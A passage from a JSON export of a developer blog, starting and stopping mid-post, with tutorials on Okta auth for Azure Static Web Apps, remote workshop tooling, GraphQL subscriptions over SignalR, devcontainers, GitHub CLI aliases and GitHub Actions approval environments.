The other bit of config we need here is what scopes to request from Okta. For SWA, you only need openid and profile as the scopes, unless you’re wanting to use a nameClaimType other than standard.\nLet’s finish off our SWA config:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 { "auth": { "identityProviders": { "customOpenIdConnectProviders": { "okta": { "registration": { "clientIdSettingName": "OKTA_ID", "clientCredential": { "clientSecretSettingName": "OKTA_SECRET" }, "openIdConnectConfiguration": { "wellKnownOpenIdConfiguration": "https://dev-920852.okta.com/.well-known/openid-configuration" } }, "login": { "nameClaimType": "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name", "scopes": ["openid", "profile"] } } } } } } With the config ready you can create the SWA in Azure and kick off a deployment (don’t forget to update the Okta app with the login/logout callbacks). When the resource is created in Azure, copy the Client ID and Client secret from Okta and create app settings in Azure using the names in your config and the values from Okta.\nUsing the provider Once the provider is registered in the config file, it is usable just like the other providers SWA offers, with the login being /.auth/login/<provider_name>, which in this case the provider_name is okta. The user information will then be exposed as standard to both the web and API components.\nIf you’re building a React application, check out my React auth helper and for the API there is a companion.\nConclusion I really like that with the GA of Static Web Apps we are now able to use custom OIDC providers with the platform. This makes it a lot easier to have controlled user access and integration with a more complex auth story when needed. Setting this up with Okta only takes a few lines of config.\nYou can check out a full code sample on my GitHub and a live demo here (but I’m not giving you my Okta credentials 😝).\n", "id": "2021-05-13-using-okta-with-static-web-apps" }, { "title": "Tools to Make Remote Workshops Easier", "url": "https://www.aaron-powell.com/posts/2021-04-29-tools-to-make-remote-workshops-easier/", "date": "Thu, 29 Apr 2021 03:50:26 +0000", "tags": [ "public-speaking", "conferences", "vscode" ], "description": "While remote workshops can be hard, here's a few tools to make them a little easier.", "content": "I wrote a post last year about my first virtual workshop. Since then I’ve had the opportunity to do more remote workshop, and in doing so I’ve picked up a few tools that I think are really useful for doing them, and possibly even useful for doing in-person workshops in the future, so I thought I’d share my learnings.\nVS Code Devcontainers I posted about devcontainers recently, but let me elaborate a bit more on them from a workshop perspective.\nFirst, a quick recap of devcontainers. A devcontainer is a file that defines a Docker environment that VS Code will detect and load. With the definition file you can pre-install extensions, define VS Code settings and run bootstrapping commands, all of which happen within a Docker container, isolating the environment from the host machine.\nThis contained, predefined environment is really useful when it comes to workshops. One of the hardest things with workshops is that before you can get someone to start tackling the exercises, you have to get them setup. This can mean installing a runtime, but which version of the runtime? 
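That runtime version question is exactly the thing a devcontainer answers up front. As a minimal sketch (assuming a Node-based workshop; the image name and version are illustrative), the devcontainer.json can simply pin the environment to a known image and the extensions you expect people to use:

{
  "name": "my-workshop",
  "image": "mcr.microsoft.com/vscode/devcontainers/javascript-node:14",
  "extensions": ["dbaeumer.vscode-eslint"]
}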
I’ve had plenty of workshops where someone has the wrong version of Node or .NET installed, and they fall behind as they have to set up their machine. When running a remote workshop this is an even bigger problem, as you can’t sit down with them and help set up their machine, so having the environment predefined in a devcontainer makes it a lot easier to get someone participating.\nIf your workshop requires a more complex environment than a runtime and some exposed ports, say you need a database, messaging queue, etc., you can even pre-install those in the Docker image (or define their install in the Dockerfile) and have them all set up and ready to go. You can even use Docker Compose to define a more complex infrastructure setup that your participants will work from.\nYou can even leverage a remote Docker host so people don’t have to run the Docker container themselves, instead you configure a VM somewhere that they connect to, reducing load on their machine.\nIf you’ve got a workshop that is broken over multiple steps you can configure it so that each step has its own devcontainer, loading the extensions only as they are needed and allowing someone to run steps side-by-side. This is an approach I’ve taken with my GraphQL and TypeScript workshop, which has a devcontainer for each step, as well as one for the whole repository.\nCodespaces GitHub Codespaces are in beta at the time of writing.\nWhile devcontainers solve a real problem faced by workshop facilitators (both remote and in-person), they do require participants to have Docker installed. While Docker and containerised development are becoming more commonplace, it’s not uncommon to have someone who doesn’t have it installed or can’t install it.\nThankfully, there’s another tool on the horizon that offers up some more interesting possibilities, GitHub Codespaces. Codespaces is hosted devcontainers accessed by VS Code in the browser (well, that’s an oversimplified explanation at least). This means there’s no longer a requirement to install Docker or even have VS Code installed, participants can open the workshop in the browser on a device as simple as an iPad, but still get the full development experience.\nWith Codespaces, the barrier to entry is now as low as someone having a GitHub account and an internet connection, the latter of which they should have to attend an online workshop… 🤔\nLive Share I talked about Live Share in my last post and the more I use it, the more I’m convinced that this is an undervalued tool.\nIf you’re unfamiliar with Live Share, it allows you to make your VS Code (or Visual Studio) instance available to anyone you invite in, making for a collaborative editor experience, similar to the likes of Google Docs/Word Online/etc. (and with all the chaos that involves). If you don’t want others messing with your code, you can make the share read-only.\nBut it’s not just giving people a view into your code, they are also able to access any webserver you run and terminals you open (again, these can be read-only), set breakpoints and debug alongside you. It even has the same browser-only experience, like you get with Codespaces, meaning that people can join without having to install anything other than a browser.\nAs a participant you are no longer fighting with the limits of technology-over-video. No doubt you’ve experienced watching code over a video conferencing platform, only to have bandwidth drop and the text become fuzzy, or you missed a step and just want to go to another file.
With Live Share you can tweak the editor to how you want to see it, bump the font up, change contrasts, even go to a file you missed.\nThen as a facilitator Live Share can be a two-way street. Something that is harder in remote workshops is that you can’t sit down with a participant and help them work through a roadblock as you can’t see their code, but with Live Share they can give you access to their editor and together you can pair-program through it, boosting their confidence in getting through the exercises, and helping you ensure everyone is still on pace with each other.\nI like to add Live Share as an extension in my devcontainer.json, so that participants are all ready to go with it as soon as they run their environment.\nCodeTour CodeTour is an extension I’ve only just started using, and I’m already loving the possibilities of it.\nCodeTour allows you to define a script for someone to follow as they are guided around a workspace. Check it out in my GraphQL and TypeScript workshop:\nThe video shows CodeTour giving us a path to follow around our exercise, along with commands to run in the terminal and code to insert. Everything covered in the steps also exists in the README, but this helps put the participant in the right context for where something goes and what to do next.\nThis can be really useful when you have a self-directed workshop (such as one available as a GitHub repo) or for when people have to tackle an exercise after you have setup the context for but leaving them to “do it themselves”. By having these tours in place, if someone gets lost, they have some guideposts that can get them back on track (again, since you can’t come and sit with them as easily).\nConclusion These three tools I see are really going to make it easier people to deliver remote/online workshops and for participants of them to feel more confident in active participation.\nWhether it’s giving everyone a consistent, predefined environment so you’re removing the “did you install the right version of something?” roadblock by using a devcontainer, giving people direct access into the facilitators editor and a remote facilitator being able to pair-program with a participant using Live Share, or having a built-in script that someone can fall back onto if they get lost without waiting for the facilitator to notice them with a CodeTour. Each of these tools makes it just that little bit more exciting and engaging for doing remote workshops.\nIs there any tools you’ve found useful for remote workshops, either as a facilitator or a participant? Let me know in the comments below!\n", "id": "2021-04-29-tools-to-make-remote-workshops-easier" }, { "title": "Making Auth Simpler for Static Web App APIs", "url": "https://www.aaron-powell.com/posts/2021-03-30-making-auth-simpler-for-static-web-app-apis/", "date": "Tue, 30 Mar 2021 04:51:02 +0000", "tags": [ "azure", "serverless", "javascript" ], "description": "Let's look at how to make it a little easier to work with authenticated Static Web App APIs", "content": "Azure Static Web Apps has built-in Authentication and Authorization for both the web and API part of the application.\nAt the end of last year, I wrote about a package to make it easier in React apps to work with auth and get access to the user details. But this still left a gap in the APIs, your APIs need to parse the JSON out of a custom header, which is base64 encoded. 
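For reference, without a helper that decoding looks roughly like this (a sketch, assuming the x-ms-client-principal header that SWA forwards to the linked Functions API):

import { HttpRequest } from "@azure/functions";

// Grab the base64-encoded header, decode it and parse the JSON -
// the resulting object mirrors the clientPrincipal you get from /.auth/me.
function getClientPrincipal(req: HttpRequest) {
  const header = req.headers["x-ms-client-principal"];
  if (!header) {
    return null;
  }
  return JSON.parse(Buffer.from(header, "base64").toString("utf8"));
}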
All a bit complicated in my book.\nSo, I decided to make another package to help with that, @aaronpowell/static-web-apps-api-auth.\nUsing the package The package exposes two functions, isAuthenticated and getUserInfo. Here’s an example of an API that uses the package:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { getUserInfo, isAuthenticated } from "@aaronpowell/static-web-apps-api-auth"; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { context.log("HTTP trigger function processed a request."); if (!isAuthenticated(req)) { context.res = { body: "You are not logged in at the moment" }; } else { const { clientPrincipal } = getUserInfo(req); context.res = { body: `Thanks for logging in ${ clientPrincipal.userDetails }. You logged in via ${ clientPrincipal.identityProvider } and have the roles ${clientPrincipal.userRoles.join(", ")}` }; } }; export default httpTrigger; The isAuthenticated function takes the request that the API receives and returns a boolean of whether the user is authenticated or not, and the getUserInfo unpacks the header data into a JavaScript object (with TypeScript typings) that you can work with.\nHopefully this makes it just that bit easier to work with authenticated experiences on Static Web Apps.\n", "id": "2021-03-30-making-auth-simpler-for-static-web-app-apis" }, { "title": "GraphQL on Azure: Part 6 - Subscriptions With SignalR", "url": "https://www.aaron-powell.com/posts/2021-03-15-graphql-on-azure-part-6-subscriptions-with-signalr/", "date": "Mon, 15 Mar 2021 23:31:19 +0000", "tags": [ "azure", "javascript", "graphql" ], "description": "It's time to take a look at how we can do real-time GraphQL using Azure", "content": "In our exploration of how to run GraphQL on Azure, we’ve looked at the two most common aspects of a GraphQL server, queries and mutations, so we can get data and store data. Today, we’re going to look at the third piece of the puzzle, subscriptions.\nWhat are GraphQL Subscriptions In GraphQL, a Subscription is used as a way to provide real-time data to connected clients. Most commonly, this is implemented over a WebSocket connection, but I’m sure you could do it with long polling or Server Sent Events if you really wanted to (I’ve not gone looking for that!). This allows the GraphQL server to broadcast query responses out when an event happens that the client is subscribed to.\nLet’s think about this in the context of the quiz game we’ve been doing. So far the game is modeled for single player, but if we wanted to add multiplayer, we could have the game wait for all players to join, and once they have, broadcast out a message via a subscription that the game is starting.\nDefining Subscriptions Like queries and mutations, subscriptions are defined as part of a GraphQL schema, and they can reuse the types that are available within our schema. Let’s make a really basic schema that contains a subscription:\n1 2 3 4 5 6 7 8 9 10 11 12 type Query { hello: String! } type Subscription { getMessage: String! 
} schema { query: Query subscription: Subscription } The subscription type that we’re defining can have as many different subscriptions as you like for clients to subscribe to, and each might return different data; it’s completely up to how your server wants to expose real-time information.\nImplementing Subscriptions on Azure For this implementation, we’re going to go back to TypeScript and use Apollo. Apollo have some really great docs on how to implement subscriptions in an Apollo Server, and that’ll be our starting point.\nBut before we can start pushing messages around, we need to work out what is going to be the messaging backbone of our server. We’re going to need some way in which the server can communicate with all connected clients, either from within a resolver, or from some external event that the server receives.\nIn Azure, when you want to do real-time communications, there’s no better service to use than SignalR Service. SignalR Service takes care of the protocol selection, connection management and scaling that you would require for a real-time application, so it’s ideal for our needs.\nCreating the GraphQL server In the previous posts, we’ve mostly talked about running GraphQL in a serverless model on Azure Functions, but for a server with subscriptions, we’re going to use Azure App Service, as we can’t expose a WebSocket connection from Azure Functions for the clients to connect to.\nApollo provides plenty of middleware options that we can choose from, so for this we’ll use the Express integration, apollo-server-express, and follow the subscriptions setup guide.\nAdding Subscriptions with SignalR When it comes to implementing the integration with SignalR, Apollo uses the graphql-subscriptions PubSubEngine class to handle the broadcasting of messages and the connections from clients.\nSo that means we’re going to need an implementation of that which uses SignalR, and thankfully there is one, @aaronpowell/graphql-signalr-subscriptions (yes, I did write it 😝).\nWe’ll start by adding that to our project:\n1 npm install --save @aaronpowell/graphql-signalr-subscriptions You’ll need to create a SignalR Service resource and get the connection string for it (I use dotenv to inject it for local dev) so you can create the PubSub engine. Create a new resolvers.ts file and create the SignalRPubSub instance in it.\n1 2 3 4 5 import { SignalRPubSub } from "@aaronpowell/graphql-signalr-subscriptions"; export const signalrPubSub = new SignalRPubSub( process.env.SIGNALR_CONNECTION_STRING ); We export this so that we can import it in our index.ts and start the client when the server starts:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 // setup ApolloServer httpServer.listen({ port }, () => { console.log( `🚀 Server ready at http://localhost:${port}${server.graphqlPath}` ); console.log( `🚀 Subscriptions ready at ws://localhost:${port}${server.subscriptionsPath}` ); signalrPubSub .start() .then(() => console.log("🚀 SignalR up and running")) .catch((err: any) => console.error(err)); }); It’s important to note that you must call start() on the instance of the PubSub engine, as this establishes the connection with SignalR, and until that happens you won’t be able to send messages.\nCommunicating with a Subscription Let’s use the simple schema from above:\n1 2 3 4 5 6 7 8 9 10 11 12 type Query { hello: String! } type Subscription { getMessage: String! } schema { query: Query subscription: Subscription } In the hello query we’ll broadcast a message, which getMessage subscribers will receive.
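For context, a connected client listens for those broadcasts with a standard GraphQL subscription operation, something along the lines of:

subscription {
  getMessage
}

Each time the server publishes to the trigger that getMessage is wired to, the client receives a fresh payload over the WebSocket.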
Let’s start with the hello resolver:\n1 2 3 4 5 6 7 8 9 10 export const resolvers = { Query: { hello() { signalrPubSub.publish("MESSAGE", { getMessage: "Hello I'm a message" }); return "Some message"; } } }; So our hello resolver is going to publish a message with the name MESSAGE and a payload of { getMessage: "..." } to clients. The name is important as it’s what the subscription resolvers will be configured to listen for and the payload represents all the possible fields that someone could select in the subscription.\nNow we’ll add the resolver for the subscription:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 export const resolvers = { Query: { hello() { signalrPubSub.publish("MESSAGE", { getMessage: "Hello I'm a message" }); return "Some message"; } }, Subscription: { getMessage: { subscribe: () => signalrPubSub.asyncIterator(["MESSAGE"]) } } }; A resolver for a subscription is a little different to query/mutation/field resolvers as you need to provide a subscribe method, which is what Apollo will invoke to get back the names of the triggers to be listening on. We’re only listening for MESSAGE here (but also only broadcasting it), but if you added another publish operation with a name of MESSAGE2, then getMessage subscribers wouldn’t receive that. Alternatively, getMessage could be listening to a several trigger names, as it might represent an aggregate view of system events.\nConclusion In this post we’ve been introduced to subscriptions in GraphQL and seen how we can use the Azure SignalR Service as the backend to provide this functionality.\nYou’ll find the code for the SignalR implementation of subscriptions here and the full example here.\n", "id": "2021-03-15-graphql-on-azure-part-6-subscriptions-with-signalr" }, { "title": "Your Open Source Project Needs a devcontainer - Here's Why", "url": "https://www.aaron-powell.com/posts/2021-03-08-your-open-source-project-needs-a-dev-container-heres-why/", "date": "Mon, 08 Mar 2021 00:04:31 +0000", "tags": [ "vscode", "docker", "oss" ], "description": "A look at devcontainers and why you should have them on all projects", "content": "TL;DR: Add a devcontainer to your projects now, you’ll thank me later.\nPrior to joining Microsoft I worked a consultant, so every few months I’d join with a new development team and undertake the dreaded task of any new starter… machine setup. Many of us have been there, you have a wiki page (often outdated) of steps to follow to setup the development environment just right, otherwise you won’t be able to work as intended.\nThese days I do similar things, but instead of it being going into a client, I’m jumping into an open source repo to poke around, try out the quickstarts or contribute back to it, and well, XKCD probably said it best.\nAs a community we celebrate individuality, whether it’s your choice of indentation style, yarn vs npm vs pnpm, linting rules, monorepo tools, etc. that’s entirely up to you as an OSS project maintainer, but as an outsider coming in, that’s where it can be a bit more difficult. When someone comes to your repo there’s a process they’ll go through, first they’ll look for and setup instructions in the README file, “what version of Node/dotnet/Python/etc. is required?”, “what package manager(s) are being used?”, “how does one install all the dependencies?”, and so on. 
Failing that, it’s digging for a contributors guide, whether that’s a CONTRIBUTING.md file, or a page on a wiki, something that’ll help them get started.\nAll of this starts producing barriers to contributing effectively. Have the wrong version of dotnet and you might not be able to compile. Not realising a linter/formatter was in use can result in a PR failing to meet the code style guide. While dealing with these PRs as a maintainer is frustrating, it’s equally so for a contributor who has to go back and rework something that they were unaware of to begin with.\nStandardising Environments with devcontainers This is where devcontainers come in. A devcontainer is used by the VS Code Remote Containers extension and works by creating a Docker container to do your development in.\nAs the development environment is within Docker, you supply the Dockerfile and VS Code will take care of building the image and starting the container for you. Then since you control the Dockerfile you can have it install any software you need for your project, set the right version of Node, install global packages, etc.\nThis is just a plain old Dockerfile, you can run it without VS Code using the standard Docker tools and mount a volume in, but the power comes when you combine it with the devcontainer.json file, which gives VS Code instructions on how to configure itself.\nUsing eslint + prettier? Tell the devcontainer to install those extensions so the user has them already installed. Want some VS Code settings enabled by default? Specify them so users don’t have to know about it.\nCreating a devcontainer You’re going to need VS Code and Docker installed, but also the Remote Extensions pack to give you the Remote Containers extension.\nOpen the command palette (CTRL/CMD + SHIFT + P) and search for Remote-Containers: Add Development Container Configuration Files. This command will give you a list of possible devcontainers that you can start with (pro tip, the definitions are here), so select the one you want.\nVS Code will detect the devcontainer and ask if you want to open in it, you can, or you can wait until we’ve made the changes to the files we want.\nThis will add a .devcontainer folder, along with the starting files you need based on your chosen container (likely Dockerfile and devcontainer.json, but sometimes some auxiliary scripts too). You’ll find the ones for this blog here, and if we look at the Dockerfile, it doesn’t do much other than set up dotnet and node, with the versions specified in the devcontainer.json file. Go ahead and add any steps you need for your dev environment, have Docker install more software, whatever is needed.\nNext, open your devcontainer.json file and it’s time to get the VS Code side of things going. Give the devcontainer a name (I called this one Aaron's blog), and set the extensions you want installed by default. I use prettier on my blog to format the markdown, so I’ll make sure that’s installed, along with a spellcheck plugin!\n1 2 3 4 5 6 7 8 9 10 11 { "name": "Aaron's blog", "extensions": [ "ms-dotnettools.csharp", "dbaeumer.vscode-eslint", "esbenp.prettier-vscode", "editorconfig.editorconfig", "streetsidesoftware.code-spell-checker" ] // snip } There are other things that can be configured from the devcontainer.json file. If you’ve got a webserver, you can tell it you’re exposing those ports, for example.
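A minimal sketch of that, alongside the default settings mentioned earlier (the port number and setting are illustrative):

{
  // merged into the devcontainer.json from above
  "forwardPorts": [1313],
  "settings": {
    "editor.formatOnSave": true
  }
}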
Another handy option is postCreateCommand, which allows you to run commands once the container has started, such as npm install, so as soon as someone starts work, everything is ready to go.\nWith all the files ready, we can open the devcontainer by reloading the window (Command Palette -> Developer: Reload Window) and clicking the notification when it appears to open the container.\nAlso, every time we change either the Dockerfile or devcontainer.json VS Code will detect it and ask if we want to recreate the environment, so we keep ourselves in sync.\nConclusion Devcontainers are awesome, we can use them to define an isolated development environment within Docker that has all that we need, and only what we need, installed in it. This helps simplify people getting into a new codebase by removing the barrier of the unknown around what to set up before they can start working. While I talked about this from the standpoint of OSS, the same pattern can be applied to internal company projects. You don’t even have to ship a Dockerfile, you can point the devcontainer.json to a Docker image and speed up the process.\nSo let’s make it easier for people to jump into a codebase by giving them a scripted environment to start with!\nBonus tip - Use with GitHub Codespaces At the time of writing GitHub Codespaces is in private preview, so you’ll need to request access, or wait until it’s publicly available. Update: At GitHub Universe 2022 it was announced that you can get up to 60 hours free Codespaces time with a Free or Pro GitHub account.\nIf you have a devcontainer in your GitHub repo, when you open a GitHub Codespace, it’ll use that definition. This is really awesome, but I don’t think I can do it justice; instead, check out this video my colleague Alvaro did to show it off. He literally can’t contain his excitement.\nImagine being able to jump into a project that runs tools like RabbitMQ, but you don’t need to make sure it’s installed/configured/etc., as the dev environment is already scripted for you.\nYeah, I think this is pretty neat.\n", "id": "2021-03-08-your-open-source-project-needs-a-dev-container-heres-why" }, { "title": "Extending the GitHub CLI", "url": "https://www.aaron-powell.com/posts/2021-01-22-extending-the-github-cli/", "date": "Fri, 22 Jan 2021 15:18:41 +1100", "tags": [ "github", "devops" ], "description": "Let's look at how we can extend the GitHub CLI to give us information about GitHub Actions", "content": "I’ve been using the GitHub CLI a lot recently for my common GitHub tasks, such as cloning and working with PRs, but there’s something else in GitHub that I’ve been using a lot that I can’t do from the CLI, working with Actions, like in my last post about approval workflows.\nNow, this might be a feature that comes soon to the CLI but I’m an impatient person, so I set out to work out how to do it myself.\nCreating custom aliases The GitHub CLI gives us the ability to create our own aliases, which could be useful if you want to, say, create an easy way to list a certain type of issue:\n1 2 3 4 5 6 7 8 9 10 $ gh alias set bugs 'issue list --label="bugs"' - Adding alias for bugs: issue list --label="bugs" ✓ Added alias. $ gh bugs Showing 2 of 7 issues in cli/cli that match your search #19 Pagination request returns empty JSON (bug) #21 Error raised when passing valid parameters (bug) This example is taken from the documentation.\nAwesome, we can create an alias for action, but how can we make it do something?
Since we don’t have anything built into the CLI that gives us access to Actions, we’ll need to use the GitHub API.\nCalling the GitHub API I’m going to use the GitHub REST API for Actions, since the GraphQL one doesn’t appear to expose this information at the time of writing.\nSince the API requires us to be authenticated, we can use the gh api command, which uses the currently authenticated user of the GitHub CLI, neat, no credential management for me!\nLet’s start by listing the workflows for the repository, which would see us calling:\n/repos/{owner}/{repo}/actions/workflows But we’re going to need to know the owner and repo information, so how can we get that? Well, the first option is that we can prompt the user for it somehow, but that can break the workflow you might have. Instead, we can leverage the tokenization feature of gh api in which if the API we’re calling has :owner and :repo in the path, it’ll be substituted with the information from the current repo your in. Great! That makes a lot of sense since you’re likely in the git repo on the command line when you want to run it anyway.\nWriting our alias Since this isn’t a simple extension on an existing command, we’ll write this alias within the config file for the CLI (usually at ~/.config/gh/config.yml). If this file doesn’t exist, go ahead and create it and add an aliases section to it and scaffold out our starting point:\n1 2 3 aliases: action: |- echo TODO Great, now we can run gh action and it’ll echo back a note to us. Time to start using the gh api command.\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows What we’ve done here is made a shell script that, when executed, will return the JSON payload from the API. If I run this on my FSharp.CosmosDB repo I get the following output to the terminal:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 { "total_count": 3, "workflows": [ { "id": 744033, "node_id": "MDg6V29ya2Zsb3c3NDQwMzM=", "name": "Build release candidate", "path": ".github/workflows/build-master.yml", "state": "active", "created_at": "2020-03-12T17:07:41.000+11:00", "updated_at": "2020-03-12T17:07:41.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/744033", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/build-master.yml", "badge_url": "https://github.com/aaronpowell/FSharp.CosmosDb/workflows/Build%20release%20candidate/badge.svg" }, { "id": 3865909, "node_id": "MDg6V29ya2Zsb3czODY1OTA5", "name": "CI build", "path": ".github/workflows/ci.yml", "state": "active", "created_at": "2020-11-27T13:50:00.000+11:00", "updated_at": "2020-11-27T13:50:00.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/3865909", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/ci.yml", "badge_url": "https://github.com/aaronpowell/FSharp.CosmosDb/workflows/CI%20build/badge.svg" }, { "id": 4075965, "node_id": "MDg6V29ya2Zsb3c0MDc1OTY1", "name": "Release build", "path": ".github/workflows/release.yml", "state": "active", "created_at": "2020-12-07T14:26:25.000+11:00", "updated_at": "2020-12-07T14:26:25.000+11:00", "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/workflows/4075965", "html_url": "https://github.com/aaronpowell/FSharp.CosmosDb/blob/main/.github/workflows/release.yml", "badge_url": 
"https://github.com/aaronpowell/FSharp.CosmosDb/workflows/Release%20build/badge.svg" } ] } Job done, ship it.\nImproving the output Ok, so maybe just dumping the JSON out like that isn’t super useful, maybe we only want a part of the data, say, the names of the workflows. Well to do that we can parse the JSON with jq (no, not that jq).\nLet’s go back to updating our alias:\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id })" We’re using jq to find the .workflows property at the response root, then pulling out the name of each workflow and returning just that:\n1 [{"name":"Build release candidate","id":744033},{"name":"CI build","id":3865909},{"name":"Release build","id":4075965}] Note: the -c flag to jq returns a condensed version of the JSON, so it’s on a single line. We’ll need that shortly.\nThat’s looking better, but I don’t really want it as JSON, I want it more human readable, I just want the names. Well, to do that we can unpack the array as separate items:\n1 2 3 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" Which gives us this output:\n1 2 3 {"name":"Build release candidate","id":744033} {"name":"CI build","id":3865909} {"name":"Release build","id":4075965} And we’ll wrap up by turning it back to a plain string using a while loop:\n1 2 3 4 5 aliases: action: |- !gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" | while read i; do echo $i | jq -r '.name' done Tada! 🎉\n1 2 3 4 $ gh action Build release candidate CI build Release build Note: I’m only picking out the .name from each item for display, so the map does more than it needs to, but I wanted to show that you could get a complex object but pick a subset of it.\nMultiple operations from a single alias This is great and all, but getting a list of workflow names isn’t the only thing you’re likely to want from the command, maybe you also want to get some info about a particular workflow run.\nUnfortunately, gh alias is only one level deep, so gh action is all it can do, it can’t do gh action list… unless we expand our shell scripting!\nIf we use the case operation in our script, we could expand our alias to do whatever we want.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 aliases: action: |- !(case $1 in list) gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name, id: .id }) | .[]" | while read i; do echo $i | jq -r '.name' done ;; *) echo The following commands are supported from '\\e[1;31m'gh action'\\e[0m': echo '\\t\\e[1;32m'list'\\e[0m' echo '\\t\\t'Returns the names of all workflows for the repo ;; esac) The way this works is that the gh action will then look at the first argument provided, $1, and then see if it matches any of the specified case switches, meaning that we can run gh action list to get output:\n1 2 3 4 5 FSharp.CosmosDb on  main via .NET 5.0.102 $ gh action list Build release candidate CI build Release build We’ve also implemented a catch all case, *, so that we can handle unexpected input and return a help system.\n1 2 3 4 $ gh action help The following commands are supported from gh action: list Returns the names of all workflows for the repo With this in place, you can write as complex an alias as you want! 
Here’s mine that also includes getting the information for a workflow run:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 aliases: action: |- !(case $1 in get) jq_filter=$([ "$2" ] && echo "map(. | select(.name == \\"$2\\")) | first" || echo 'first') res=$(gh api /repos/:owner/:repo/actions/runs | jq -r ".workflow_runs | $jq_filter") url=$(echo $res | jq -r '.html_url') status=$(echo $res | jq -r '.status') name=$(echo $res | jq -r '.name') created=$(echo $res | jq -r '.created_at' | xargs date '+%A %b %d @ %H:%m' --date) echo '\\e[1;34m'$name'\\e[0m' \\($url\\) echo '\\t'Started: '\\e[1;33m'$created'\\e[0m' case $status in completed) echo '\\t'Status: '\\e[1;32m'$status '\\e[0m'\\('\\e[1;33m'$(echo $res | jq -r '.conclusion')'\\e[0m'\\)'\\e[0m' echo '\\t'Completed: '\\e[1;32m'$(echo $res | jq -r '.updated_at' | xargs date '+%A %b %d @ %H:%m' --date)'\\e[0m' ;; waiting) echo '\\t'Waiting... ;; esac ;; list) gh api /repos/:owner/:repo/actions/workflows | jq -c ".workflows | map({ name: .name }) | .[]" | while read i; do echo $i | jq -r '.name' done ;; *) echo The following commands are supported from '\\e[1;31m'gh action'\\e[0m': echo '\\t\\e[1;32m'get'\\e[0m' '\\e[1;33m?workflow name\\e[0m' echo '\\t\\t'Returns info of the most recent Action run. If '\\e[1;33m'workflow name'\\e[0m' is provided, it will return the most recent run for that workflow echo '\\t\\e[1;32m'list'\\e[0m' echo '\\t\\t'Returns the names of all workflows for the repo ;; esac) And it will return the following:\n1 2 3 4 5 $ gh action get "Release build" Release build (https://github.com/aaronpowell/FSharp.CosmosDb/actions/runs/459861911) Started: Monday Jan 04 @ 09:01 Status: completed (failure) Completed: Monday Jan 04 @ 09:01 You can find my config file on my GitHub.\nConclusion With a little bit of scripting magic we’ve been able to create a nice new feature on the GitHub CLI that can show us information about the GitHub Actions in our repository. This pattern can be applied to anything you want from the GitHub API, either the REST or GraphQL, depending on what’s available where.\nHave you been doing any extensions on the GitHub CLI? Share them below so we can get as much power as possible.\n", "id": "2021-01-22-extending-the-github-cli" }, { "title": "Using Environments for Approval Workflows With GitHub Actions", "url": "https://www.aaron-powell.com/posts/2021-01-11-using-environments-for-approval-workflows-with-github/", "date": "Mon, 11 Jan 2021 10:33:48 +1100", "tags": [ "devops", "javascript" ], "description": "", "content": "Last year I wrote a post about how I implemented an overly complex approval workflow with GitHub Actions. While it wasn’t the simplest solution, at the time it was a means to an end as we didn’t have any built-in way to do approval workflows with GitHub Actions. At the end of last year that changed with the introduction of Environments (announcement post). Environments bring in the concept of protection rules, which currently supports two types, required reviewers and a wait timer, which is exactly what we need for an approval workflow.\nSo with this available to us, let’s look at taking the workflow to publish GitHub Packages and turn it into an approval-based workflow.\nSetting up Environments Navigate to the GitHub repo you want to set this up on and then go to Settings -> Environments.\nFrom here we can create new Environments. 
You can make as many as you need, and you can have different sets of environments for different workflows, they don’t have to be reused or generic. We’ll create two environments, one called build, which will be the normal compilation step of our workflow and one called release, which will have the approval on it and used to publish to our package registry (I’m using npm here, but it could be NuGet, or anything else).\nOn the Configure release screen we’ll add a protection rule of Required reviewer, and I’ve added myself as the person required, but set whoever is the right person for this environment (you can nominate up to 6 people).\nRemember to click Save protection rules (I kept forgetting!), and your environments are good to go.\nImplementing our workflow With the Environments setup, we can now return to our GitHub Actions workflow and overhaul it to work with the Environments. We’ll also take this opportunity to have our workflow create a GitHub Release for us as well.\nTo achieve this, we’ll have four distinct environments, build to create the package and draft a GitHub Release, release to publish the GitHub Release, publish-npm to publish the package to npm and publish-gpr to publish to GitHub Packages. The release stage will need to wait until build has completed, and we’ve approved the release, and the two publish environments will wait for the release stage to complete.\nNote: publish-npm and publish-gpr aren’t created as Environments in GitHub but they are implicit Environments. You could create explicit environments if you wanted protection rules, but I wanted to show how you can use explicit and implicit Environments together.\nLet’s scaffold the workflow:\n1 2 3 4 5 6 7 8 9 10 11 name: Publish a release on: push: tags: - v* #version is cut env: NODE_VERSION: 12 jobs: It’s going to be triggered on a new version tag being pushed, which I like to do manually.\nThe build stage We’ll start by associating the build job with the Environment:\n1 2 3 4 5 6 7 8 9 10 jobs: build: runs-on: ubuntu-latest defaults: run: working-directory: react-static-web-apps-auth environment: name: build url: ${{ steps.create_release.outputs.html_url }} steps: Note: you can ignore the working-directory default, I need that due to the structure of my Git repo. It’s left in for completeness of the workflow file at the end.\nTo link the job to the Environment we created in GitHub we add an environment node and provide it the name of the Environment we created, build in this 